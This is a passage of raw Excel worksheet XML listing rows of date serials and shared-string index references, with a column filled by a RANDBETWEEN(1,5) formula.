    <row r="14484" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14484" s="1">
        <v>43241.47797453704</v>
      </c>
      <c r="C14484" t="s">
        <v>65</v>
      </c>
      <c r="E14484" s="2" t="s">
        <v>13011</v>
      </c>
      <c r="F14484">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14485" s="1">
        <v>43241.432210648149</v>
      </c>
      <c r="C14485" t="s">
        <v>10</v>
      </c>
      <c r="D14485" t="s">
        <v>178</v>
      </c>
      <c r="E14485" t="s">
        <v>13012</v>
      </c>
      <c r="F14485">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14486" s="1">
        <v>43241.419432870367</v>
      </c>
      <c r="C14486" t="s">
        <v>10</v>
      </c>
      <c r="D14486" t="s">
        <v>163</v>
      </c>
      <c r="E14486" t="s">
        <v>13013</v>
      </c>
      <c r="F14486">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14487" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14487" s="1">
        <v>43241.418506944443</v>
      </c>
      <c r="C14487" t="s">
        <v>48</v>
      </c>
      <c r="E14487" s="2" t="s">
        <v>13014</v>
      </c>
      <c r="F14487">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14488" s="1">
        <v>43241.417337962965</v>
      </c>
      <c r="C14488" t="s">
        <v>10</v>
      </c>
      <c r="D14488" t="s">
        <v>151</v>
      </c>
      <c r="E14488" t="s">
        <v>13015</v>
      </c>
      <c r="F14488">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14489" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14489" s="1">
        <v>43241.413090277776</v>
      </c>
      <c r="C14489" t="s">
        <v>10</v>
      </c>
      <c r="D14489" t="s">
        <v>89</v>
      </c>
      <c r="E14489" t="s">
        <v>13016</v>
      </c>
      <c r="F14489">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14490" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14490" s="1">
        <v>43241.384976851848</v>
      </c>
      <c r="C14490" t="s">
        <v>1501</v>
      </c>
      <c r="D14490" t="s">
        <v>71</v>
      </c>
      <c r="E14490" s="2" t="s">
        <v>13017</v>
      </c>
      <c r="F14490">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14491" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14491" s="1">
        <v>43241.382141203707</v>
      </c>
      <c r="C14491" t="s">
        <v>48</v>
      </c>
      <c r="E14491" s="2" t="s">
        <v>13018</v>
      </c>
      <c r="F14491">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14492" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14492" s="1">
        <v>43241.371458333335</v>
      </c>
      <c r="C14492" t="s">
        <v>10</v>
      </c>
      <c r="D14492" t="s">
        <v>163</v>
      </c>
      <c r="E14492" t="s">
        <v>13019</v>
      </c>
      <c r="F14492">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14493" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A14493" s="1">
        <v>43241.368078703701</v>
      </c>
      <c r="C14493" t="s">
        <v>107</v>
      </c>
      <c r="D14493" t="s">
        <v>56</v>
      </c>
      <c r="E14493" s="2" t="s">
        <v>13020</v>
      </c>
      <c r="F14493">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14494" s="1">
        <v>43241.364907407406</v>
      </c>
      <c r="C14494" t="s">
        <v>173</v>
      </c>
      <c r="E14494" t="s">
        <v>13021</v>
      </c>
      <c r="F14494">
        <f t="shared" ca="1" si="226"/>
        <v>4</v>
      </c>
    </row>
    <row r="14495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14495" s="1">
        <v>43241.347245370373</v>
      </c>
      <c r="C14495" t="s">
        <v>50</v>
      </c>
      <c r="D14495" t="s">
        <v>312</v>
      </c>
      <c r="E14495" t="s">
        <v>13022</v>
      </c>
      <c r="F14495">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14496" s="1">
        <v>43241.325902777775</v>
      </c>
      <c r="C14496" t="s">
        <v>477</v>
      </c>
      <c r="D14496" t="s">
        <v>2214</v>
      </c>
      <c r="E14496" t="s">
        <v>13023</v>
      </c>
      <c r="F14496">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14497" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A14497" s="1">
        <v>43241.217523148145</v>
      </c>
      <c r="C14497" t="s">
        <v>10</v>
      </c>
      <c r="E14497" s="2" t="s">
        <v>13024</v>
      </c>
      <c r="F14497">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14498" s="1">
        <v>43241.20045138889</v>
      </c>
      <c r="C14498" t="s">
        <v>134</v>
      </c>
      <c r="D14498" t="s">
        <v>312</v>
      </c>
      <c r="E14498" t="s">
        <v>13025</v>
      </c>
      <c r="F14498">
        <f t="shared" ca="1" si="226"/>
        <v>4</v>
      </c>
    </row>
    <row r="14499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14499" s="1">
        <v>43241.190312500003</v>
      </c>
      <c r="C14499" t="s">
        <v>166</v>
      </c>
      <c r="E14499" t="s">
        <v>13026</v>
      </c>
      <c r="F14499">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14500" s="1">
        <v>43241.18509259259</v>
      </c>
      <c r="C14500" t="s">
        <v>60</v>
      </c>
      <c r="E14500" t="s">
        <v>13027</v>
      </c>
      <c r="F14500">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14501" s="1">
        <v>43241.180219907408</v>
      </c>
      <c r="C14501" t="s">
        <v>41</v>
      </c>
      <c r="E14501" t="s">
        <v>13028</v>
      </c>
      <c r="F14501">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14502" s="1">
        <v>43241.130243055559</v>
      </c>
      <c r="C14502" t="s">
        <v>41</v>
      </c>
      <c r="E14502" t="s">
        <v>13029</v>
      </c>
      <c r="F14502">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14503" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14503" s="1">
        <v>43241.11917824074</v>
      </c>
      <c r="C14503" t="s">
        <v>10</v>
      </c>
      <c r="D14503" t="s">
        <v>80</v>
      </c>
      <c r="E14503" s="2" t="s">
        <v>13030</v>
      </c>
      <c r="F14503">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14504" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A14504" s="1">
        <v>43241.09615740741</v>
      </c>
      <c r="C14504" t="s">
        <v>41</v>
      </c>
      <c r="E14504" s="2" t="s">
        <v>13031</v>
      </c>
      <c r="F14504">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14505" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A14505" s="1">
        <v>43241.094722222224</v>
      </c>
      <c r="C14505" t="s">
        <v>41</v>
      </c>
      <c r="E14505" s="2" t="s">
        <v>13032</v>
      </c>
      <c r="F14505">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14506" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14506" s="1">
        <v>43241.055821759262</v>
      </c>
      <c r="C14506" t="s">
        <v>140</v>
      </c>
      <c r="D14506" t="s">
        <v>141</v>
      </c>
      <c r="E14506" s="2" t="s">
        <v>13033</v>
      </c>
      <c r="F14506">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14507" s="1">
        <v>43241.053344907406</v>
      </c>
      <c r="C14507" t="s">
        <v>41</v>
      </c>
      <c r="E14507" t="s">
        <v>13034</v>
      </c>
      <c r="F14507">
        <f t="shared" ca="1" si="226"/>
        <v>4</v>
      </c>
    </row>
    <row r="14508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14508" s="1">
        <v>43241.051782407405</v>
      </c>
      <c r="C14508" t="s">
        <v>140</v>
      </c>
      <c r="D14508" t="s">
        <v>141</v>
      </c>
      <c r="E14508" t="s">
        <v>13035</v>
      </c>
      <c r="F14508">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14509" s="1">
        <v>43241.033692129633</v>
      </c>
      <c r="C14509" t="s">
        <v>339</v>
      </c>
      <c r="E14509" t="s">
        <v>13036</v>
      </c>
      <c r="F14509">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14510" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14510" s="1">
        <v>43241.022037037037</v>
      </c>
      <c r="C14510" t="s">
        <v>140</v>
      </c>
      <c r="D14510" t="s">
        <v>234</v>
      </c>
      <c r="E14510" t="s">
        <v>13037</v>
      </c>
      <c r="F14510">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14511" s="1">
        <v>43240.989074074074</v>
      </c>
      <c r="C14511" t="s">
        <v>314</v>
      </c>
      <c r="E14511" t="s">
        <v>13038</v>
      </c>
      <c r="F14511">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14512" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14512" s="1">
        <v>43240.959629629629</v>
      </c>
      <c r="C14512" t="s">
        <v>10</v>
      </c>
      <c r="D14512" t="s">
        <v>107</v>
      </c>
      <c r="E14512" s="2" t="s">
        <v>13039</v>
      </c>
      <c r="F14512">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14513" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14513" s="1">
        <v>43240.932291666664</v>
      </c>
      <c r="C14513" t="s">
        <v>314</v>
      </c>
      <c r="E14513" t="s">
        <v>13040</v>
      </c>
      <c r="F14513">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14514" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14514" s="1">
        <v>43240.37060185185</v>
      </c>
      <c r="C14514" t="s">
        <v>2545</v>
      </c>
      <c r="D14514" t="s">
        <v>1993</v>
      </c>
      <c r="E14514" t="s">
        <v>13041</v>
      </c>
      <c r="F14514">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14515" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14515" s="1">
        <v>43240.259050925924</v>
      </c>
      <c r="C14515" t="s">
        <v>144</v>
      </c>
      <c r="D14515" t="s">
        <v>82</v>
      </c>
      <c r="E14515" t="s">
        <v>13042</v>
      </c>
      <c r="F14515">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14516" s="1">
        <v>43240.092627314814</v>
      </c>
      <c r="C14516" t="s">
        <v>10</v>
      </c>
      <c r="D14516" t="s">
        <v>6</v>
      </c>
      <c r="E14516" t="s">
        <v>13043</v>
      </c>
      <c r="F14516">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14517" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14517" s="1">
        <v>43239.898356481484</v>
      </c>
      <c r="C14517" t="s">
        <v>10</v>
      </c>
      <c r="D14517" t="s">
        <v>494</v>
      </c>
      <c r="E14517" t="s">
        <v>13044</v>
      </c>
      <c r="F14517">
        <f t="shared" ca="1" si="226"/>
        <v>4</v>
      </c>
    </row>
    <row r="14518" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14518" s="1">
        <v>43239.791759259257</v>
      </c>
      <c r="C14518" t="s">
        <v>118</v>
      </c>
      <c r="D14518" t="s">
        <v>36</v>
      </c>
      <c r="E14518" t="s">
        <v>13045</v>
      </c>
      <c r="F14518">
        <f t="shared" ca="1" si="226"/>
        <v>3</v>
      </c>
    </row>
    <row r="14519" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14519" s="1">
        <v>43239.550254629627</v>
      </c>
      <c r="C14519" t="s">
        <v>686</v>
      </c>
      <c r="D14519" t="s">
        <v>2214</v>
      </c>
      <c r="E14519" s="2" t="s">
        <v>13046</v>
      </c>
      <c r="F14519">
        <f t="shared" ca="1" si="226"/>
        <v>1</v>
      </c>
    </row>
    <row r="14520" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14520" s="1">
        <v>43239.269409722219</v>
      </c>
      <c r="C14520" t="s">
        <v>124</v>
      </c>
      <c r="E14520" s="2" t="s">
        <v>13047</v>
      </c>
      <c r="F14520">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14521" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14521" s="1">
        <v>43239.246493055558</v>
      </c>
      <c r="C14521" t="s">
        <v>41</v>
      </c>
      <c r="E14521" t="s">
        <v>13048</v>
      </c>
      <c r="F14521">
        <f t="shared" ca="1" si="226"/>
        <v>4</v>
      </c>
    </row>
    <row r="14522" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14522" s="1">
        <v>43239.211400462962</v>
      </c>
      <c r="C14522" t="s">
        <v>2187</v>
      </c>
      <c r="E14522" t="s">
        <v>13049</v>
      </c>
      <c r="F14522">
        <f t="shared" ca="1" si="226"/>
        <v>4</v>
      </c>
    </row>
    <row r="14523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14523" s="1">
        <v>43239.210439814815</v>
      </c>
      <c r="C14523" t="s">
        <v>41</v>
      </c>
      <c r="E14523" t="s">
        <v>13050</v>
      </c>
      <c r="F14523">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14524" s="1">
        <v>43239.200868055559</v>
      </c>
      <c r="C14524" t="s">
        <v>197</v>
      </c>
      <c r="E14524" t="s">
        <v>13051</v>
      </c>
      <c r="F14524">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14525" s="1">
        <v>43239.190092592595</v>
      </c>
      <c r="C14525" t="s">
        <v>13052</v>
      </c>
      <c r="D14525" t="s">
        <v>36</v>
      </c>
      <c r="E14525" t="s">
        <v>13053</v>
      </c>
      <c r="F14525">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14526" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14526" s="1">
        <v>43239.186030092591</v>
      </c>
      <c r="C14526" t="s">
        <v>107</v>
      </c>
      <c r="D14526" t="s">
        <v>39</v>
      </c>
      <c r="E14526" t="s">
        <v>13054</v>
      </c>
      <c r="F14526">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14527" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14527" s="1">
        <v>43239.159259259257</v>
      </c>
      <c r="C14527" t="s">
        <v>5239</v>
      </c>
      <c r="D14527" t="s">
        <v>36</v>
      </c>
      <c r="E14527" t="s">
        <v>13055</v>
      </c>
      <c r="F14527">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14528" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14528" s="1">
        <v>43239.145682870374</v>
      </c>
      <c r="C14528" t="s">
        <v>50</v>
      </c>
      <c r="D14528" t="s">
        <v>36</v>
      </c>
      <c r="E14528" t="s">
        <v>13056</v>
      </c>
      <c r="F14528">
        <f t="shared" ca="1" si="226"/>
        <v>5</v>
      </c>
    </row>
    <row r="14529" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14529" s="1">
        <v>43239.134965277779</v>
      </c>
      <c r="C14529" t="s">
        <v>73</v>
      </c>
      <c r="E14529" t="s">
        <v>13057</v>
      </c>
      <c r="F14529">
        <f t="shared" ca="1" si="226"/>
        <v>2</v>
      </c>
    </row>
    <row r="14530" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14530" s="1">
        <v>43239.124016203707</v>
      </c>
      <c r="C14530" t="s">
        <v>410</v>
      </c>
      <c r="D14530" t="s">
        <v>312</v>
      </c>
      <c r="E14530" t="s">
        <v>13058</v>
      </c>
      <c r="F14530">
        <f t="shared" ref="F14530:F14593" ca="1" si="227">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="14531" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14531" s="1">
        <v>43238.928460648145</v>
      </c>
      <c r="C14531" t="s">
        <v>4508</v>
      </c>
      <c r="D14531" t="s">
        <v>89</v>
      </c>
      <c r="E14531" s="2" t="s">
        <v>13059</v>
      </c>
      <c r="F14531">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14532" s="1">
        <v>43238.92396990741</v>
      </c>
      <c r="C14532" t="s">
        <v>45</v>
      </c>
      <c r="D14532" t="s">
        <v>36</v>
      </c>
      <c r="E14532" t="s">
        <v>13060</v>
      </c>
      <c r="F14532">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14533" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14533" s="1">
        <v>43238.922905092593</v>
      </c>
      <c r="C14533" t="s">
        <v>154</v>
      </c>
      <c r="D14533" t="s">
        <v>36</v>
      </c>
      <c r="E14533" t="s">
        <v>13061</v>
      </c>
      <c r="F14533">
        <f t="shared" ca="1" si="227"/>
        <v>3</v>
      </c>
    </row>
    <row r="14534" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14534" s="1">
        <v>43238.913321759261</v>
      </c>
      <c r="C14534" t="s">
        <v>634</v>
      </c>
      <c r="D14534" t="s">
        <v>36</v>
      </c>
      <c r="E14534" t="s">
        <v>13062</v>
      </c>
      <c r="F14534">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14535" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14535" s="1">
        <v>43238.891724537039</v>
      </c>
      <c r="C14535" t="s">
        <v>73</v>
      </c>
      <c r="E14535" t="s">
        <v>13063</v>
      </c>
      <c r="F14535">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14536" s="1">
        <v>43238.86991898148</v>
      </c>
      <c r="C14536" t="s">
        <v>10</v>
      </c>
      <c r="D14536" t="s">
        <v>6</v>
      </c>
      <c r="E14536" t="s">
        <v>13064</v>
      </c>
      <c r="F14536">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14537" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14537" s="1">
        <v>43238.827245370368</v>
      </c>
      <c r="C14537" t="s">
        <v>410</v>
      </c>
      <c r="D14537" t="s">
        <v>11</v>
      </c>
      <c r="E14537" t="s">
        <v>13065</v>
      </c>
      <c r="F14537">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14538" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A14538" s="1">
        <v>43238.76226851852</v>
      </c>
      <c r="C14538" t="s">
        <v>197</v>
      </c>
      <c r="D14538" t="s">
        <v>56</v>
      </c>
      <c r="E14538" s="2" t="s">
        <v>13066</v>
      </c>
      <c r="F14538">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14539" s="1">
        <v>43238.706782407404</v>
      </c>
      <c r="C14539" t="s">
        <v>10</v>
      </c>
      <c r="D14539" t="s">
        <v>52</v>
      </c>
      <c r="E14539" t="s">
        <v>13067</v>
      </c>
      <c r="F14539">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14540" s="1">
        <v>43238.693043981482</v>
      </c>
      <c r="C14540" t="s">
        <v>529</v>
      </c>
      <c r="D14540" t="s">
        <v>36</v>
      </c>
      <c r="E14540" t="s">
        <v>13068</v>
      </c>
      <c r="F14540">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14541" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14541" s="1">
        <v>43238.690023148149</v>
      </c>
      <c r="C14541" t="s">
        <v>82</v>
      </c>
      <c r="D14541" t="s">
        <v>244</v>
      </c>
      <c r="E14541" s="2" t="s">
        <v>13069</v>
      </c>
      <c r="F14541">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14542" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14542" s="1">
        <v>43238.677407407406</v>
      </c>
      <c r="C14542" t="s">
        <v>461</v>
      </c>
      <c r="D14542" t="s">
        <v>36</v>
      </c>
      <c r="E14542" t="s">
        <v>13070</v>
      </c>
      <c r="F14542">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14543" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14543" s="1">
        <v>43238.671458333331</v>
      </c>
      <c r="C14543" t="s">
        <v>10</v>
      </c>
      <c r="D14543" t="s">
        <v>494</v>
      </c>
      <c r="E14543" t="s">
        <v>13071</v>
      </c>
      <c r="F14543">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14544" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14544" s="1">
        <v>43238.666967592595</v>
      </c>
      <c r="C14544" t="s">
        <v>10</v>
      </c>
      <c r="D14544" t="s">
        <v>20</v>
      </c>
      <c r="E14544" t="s">
        <v>13072</v>
      </c>
      <c r="F14544">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14545" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14545" s="1">
        <v>43238.666875000003</v>
      </c>
      <c r="C14545" t="s">
        <v>352</v>
      </c>
      <c r="D14545" t="s">
        <v>36</v>
      </c>
      <c r="E14545" t="s">
        <v>13073</v>
      </c>
      <c r="F14545">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14546" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14546" s="1">
        <v>43238.637881944444</v>
      </c>
      <c r="C14546" t="s">
        <v>10</v>
      </c>
      <c r="D14546" t="s">
        <v>36</v>
      </c>
      <c r="E14546" t="s">
        <v>13074</v>
      </c>
      <c r="F14546">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14547" s="1">
        <v>43238.587962962964</v>
      </c>
      <c r="C14547" t="s">
        <v>6</v>
      </c>
      <c r="D14547" t="s">
        <v>114</v>
      </c>
      <c r="E14547" t="s">
        <v>13075</v>
      </c>
      <c r="F14547">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14548" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14548" s="1">
        <v>43238.582048611112</v>
      </c>
      <c r="C14548" t="s">
        <v>10</v>
      </c>
      <c r="D14548" t="s">
        <v>17</v>
      </c>
      <c r="E14548" t="s">
        <v>13076</v>
      </c>
      <c r="F14548">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14549" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14549" s="1">
        <v>43238.56621527778</v>
      </c>
      <c r="C14549" t="s">
        <v>10</v>
      </c>
      <c r="D14549" t="s">
        <v>80</v>
      </c>
      <c r="E14549" t="s">
        <v>13077</v>
      </c>
      <c r="F14549">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14550" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14550" s="1">
        <v>43238.56318287037</v>
      </c>
      <c r="C14550" t="s">
        <v>48</v>
      </c>
      <c r="F14550">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14551" s="1">
        <v>43238.533229166664</v>
      </c>
      <c r="C14551" t="s">
        <v>10</v>
      </c>
      <c r="D14551" t="s">
        <v>36</v>
      </c>
      <c r="E14551" t="s">
        <v>13078</v>
      </c>
      <c r="F14551">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14552" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14552" s="1">
        <v>43238.526307870372</v>
      </c>
      <c r="C14552" t="s">
        <v>6</v>
      </c>
      <c r="D14552" t="s">
        <v>25</v>
      </c>
      <c r="E14552" s="2" t="s">
        <v>13079</v>
      </c>
      <c r="F14552">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14553" s="1">
        <v>43238.515196759261</v>
      </c>
      <c r="C14553" t="s">
        <v>10</v>
      </c>
      <c r="D14553" t="s">
        <v>6</v>
      </c>
      <c r="E14553" t="s">
        <v>13080</v>
      </c>
      <c r="F14553">
        <f t="shared" ca="1" si="227"/>
        <v>3</v>
      </c>
    </row>
    <row r="14554" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14554" s="1">
        <v>43238.515185185184</v>
      </c>
      <c r="C14554" t="s">
        <v>993</v>
      </c>
      <c r="D14554" t="s">
        <v>232</v>
      </c>
      <c r="E14554" t="s">
        <v>13081</v>
      </c>
      <c r="F14554">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14555" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14555" s="1">
        <v>43238.51116898148</v>
      </c>
      <c r="C14555" t="s">
        <v>10</v>
      </c>
      <c r="D14555" t="s">
        <v>17</v>
      </c>
      <c r="E14555" t="s">
        <v>13082</v>
      </c>
      <c r="F14555">
        <f t="shared" ca="1" si="227"/>
        <v>2</v>
      </c>
    </row>
    <row r="14556" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14556" s="1">
        <v>43238.50445601852</v>
      </c>
      <c r="C14556" t="s">
        <v>10</v>
      </c>
      <c r="D14556" t="s">
        <v>251</v>
      </c>
      <c r="E14556" s="2" t="s">
        <v>13083</v>
      </c>
      <c r="F14556">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14557" s="1">
        <v>43238.493622685186</v>
      </c>
      <c r="C14557" t="s">
        <v>82</v>
      </c>
      <c r="E14557" t="s">
        <v>13084</v>
      </c>
      <c r="F14557">
        <f t="shared" ca="1" si="227"/>
        <v>5</v>
      </c>
    </row>
    <row r="14558" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14558" s="1">
        <v>43238.472777777781</v>
      </c>
      <c r="C14558" t="s">
        <v>43</v>
      </c>
      <c r="E14558" s="2" t="s">
        <v>13085</v>
      </c>
      <c r="F14558">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14559" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A14559" s="1">
        <v>43238.466261574074</v>
      </c>
      <c r="C14559" t="s">
        <v>10</v>
      </c>
      <c r="D14559" t="s">
        <v>80</v>
      </c>
      <c r="E14559" s="2" t="s">
        <v>13086</v>
      </c>
      <c r="F14559">
        <f t="shared" ca="1" si="227"/>
        <v>1</v>
      </c>
    </row>
    <row r="14560" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14560" s="1">
        <v>43238.454201388886</v>
      </c>
      <c r="C14560" t="s">
        <v>2545</v>
      </c>
      <c r="D14560" t="s">
        <v>251</v>
      </c>
      <c r="E14560" t="s">
        <v>13041</v>
      </c>
      <c r="F14560">
        <f t="shared" ca="1" si="227"/>
        <v>4</v>
      </c>
    </row>
    <row r="14561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14561" s="1">
        <v>43238.454131944447</v>
      </c>
      <c r="C14561" t="s">
        <v>14</v>
      </c>
      <c r="D14561" t="s">
        <v>36</v>
      </c>
      <c r="E14561" t="s">
        <v>13087</v>
      </c>
      <c r="F14561">
        <f t="shared" ca="1" si="227"/>
